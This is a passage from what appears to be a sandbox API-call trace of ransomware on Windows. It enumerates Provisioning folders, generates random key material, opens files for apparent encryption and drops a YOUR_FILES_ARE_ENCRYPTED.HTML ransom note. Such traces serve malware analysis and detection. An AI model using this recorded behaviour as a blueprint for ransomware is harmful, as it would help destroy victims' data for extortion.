param_1="03") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="57") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A4") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="EA") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="EF") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="C4") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="CA") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="35") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="35") returned 2 [0107.194] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" [0107.194] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.194] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0107.195] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fd4d57, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9fd4d57, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9fd4d57, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0107.195] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.195] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml") returned 100 [0107.195] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.195] lstrlenW (lpString=".xml") returned 4 [0107.195] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.195] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.195] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.195] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0107.195] CloseHandle (hObject=0x314) returned 1 [0107.195] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0107.195] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.195] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned 85 [0107.195] GetProcessHeap () returned 0x600000 [0107.195] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.196] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov" [0107.196] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*" [0107.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.197] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.197] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0107.197] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.197] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime") returned 93 [0107.197] GetProcessHeap () returned 0x600000 [0107.197] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.198] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime" [0107.198] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*" [0107.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.200] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0107.200] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e574f3, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e574f3, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x19aa, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0107.200] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.200] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0107.200] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.200] lstrlenW (lpString=".provxml") returned 8 [0107.200] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.200] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x586, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0107.200] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.200] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0107.200] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0107.200] lstrlenW (lpString=".provxml") returned 8 [0107.200] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0107.200] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ec9c48, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9ec9c48, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9ec9c48, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1018, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1 [0107.200] StrStrIW (lpFirst="Power_2.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.200] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml") returned 109 [0107.200] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0107.200] lstrlenW (lpString=".provxml") returned 8 [0107.200] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0107.200] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f16127, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f16127, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f16127, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_3.provxml", cAlternateFileName="POWER_~4.PRO")) returned 1 [0107.201] StrStrIW (lpFirst="Power_3.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.201] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_3.provxml") returned 109 [0107.201] PathFindExtensionW (pszPath="Power_3.provxml") returned=".provxml" [0107.201] lstrlenW (lpString=".provxml") returned 8 [0107.201] PathFindExtensionW (pszPath="Power_3.provxml") returned=".provxml" [0107.201] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f62605, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f62605, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f62605, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1939, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_4.provxml", cAlternateFileName="PO21B6~1.PRO")) returned 1 [0107.201] StrStrIW (lpFirst="Power_4.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.201] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_4.provxml") returned 109 [0107.201] PathFindExtensionW (pszPath="Power_4.provxml") returned=".provxml" [0107.201] lstrlenW (lpString=".provxml") returned 8 [0107.201] PathFindExtensionW (pszPath="Power_4.provxml") returned=".provxml" [0107.201] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9f88875, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9f88875, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9f88875, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_5.provxml", cAlternateFileName="PO5EBD~1.PRO")) returned 1 [0107.201] StrStrIW (lpFirst="Power_5.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.201] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_5.provxml") returned 109 [0107.201] PathFindExtensionW (pszPath="Power_5.provxml") returned=".provxml" [0107.201] lstrlenW (lpString=".provxml") returned 8 [0107.201] PathFindExtensionW (pszPath="Power_5.provxml") returned=".provxml" [0107.201] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x757, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_6.provxml", cAlternateFileName="PO805B~1.PRO")) returned 1 [0107.201] StrStrIW (lpFirst="Power_6.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.201] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_6.provxml") returned 109 [0107.201] PathFindExtensionW (pszPath="Power_6.provxml") returned=".provxml" [0107.201] lstrlenW (lpString=".provxml") returned 8 [0107.201] PathFindExtensionW (pszPath="Power_6.provxml") returned=".provxml" [0107.201] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x93f, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_7.provxml", cAlternateFileName="POFE19~1.PRO")) returned 1 [0107.201] StrStrIW (lpFirst="Power_7.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.201] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_7.provxml") returned 109 [0107.201] PathFindExtensionW (pszPath="Power_7.provxml") returned=".provxml" [0107.201] lstrlenW (lpString=".provxml") returned 8 [0107.201] PathFindExtensionW (pszPath="Power_7.provxml") returned=".provxml" [0107.201] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9faeae8, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9faeae8, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x93f, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_7.provxml", cAlternateFileName="POFE19~1.PRO")) returned 0 [0107.201] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.202] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0107.202] GetProcessHeap () returned 0x600000 [0107.202] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0107.202] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.208] WriteFile (in: hFile=0x31c, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.209] CloseHandle (hObject=0x31c) returned 1 [0107.209] GetProcessHeap () returned 0x600000 [0107.209] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0107.210] GetProcessHeap () returned 0x600000 [0107.210] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.211] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0107.211] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.211] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml") returned 97 [0107.211] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.211] lstrlenW (lpString=".xml") returned 4 [0107.211] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.211] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.211] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=1491) returned 1 [0107.211] GetProcessHeap () returned 0x600000 [0107.211] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0107.213] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="2B") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="CB") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="E6") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="42") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="2F") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="DE") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="F6") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="77") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="8D") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="C2") returned 2 [0107.213] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="AB") returned 2 [0107.214] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="1B") returned 2 [0107.214] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="65") returned 2 [0107.214] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="5D") returned 2 [0107.214] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="66") returned 2 [0107.214] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="45") returned 2 [0107.214] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="13") returned 2 [0107.214] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="B2") returned 2 [0107.214] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="EE") returned 2 [0107.214] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="5E") returned 2 [0107.214] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="2F") returned 2 [0107.214] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="17") returned 2 [0107.214] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="45") returned 2 [0107.214] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="75") returned 2 [0107.214] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="1D") returned 2 [0107.214] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="CF") returned 2 [0107.214] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="7D") returned 2 [0107.214] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="02") returned 2 [0107.214] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="C4") returned 2 [0107.214] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="64") returned 2 [0107.214] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="02") returned 2 [0107.214] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="6A") returned 2 [0107.215] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime.xml" [0107.215] CreateIoCompletionPort (FileHandle=0x31c, 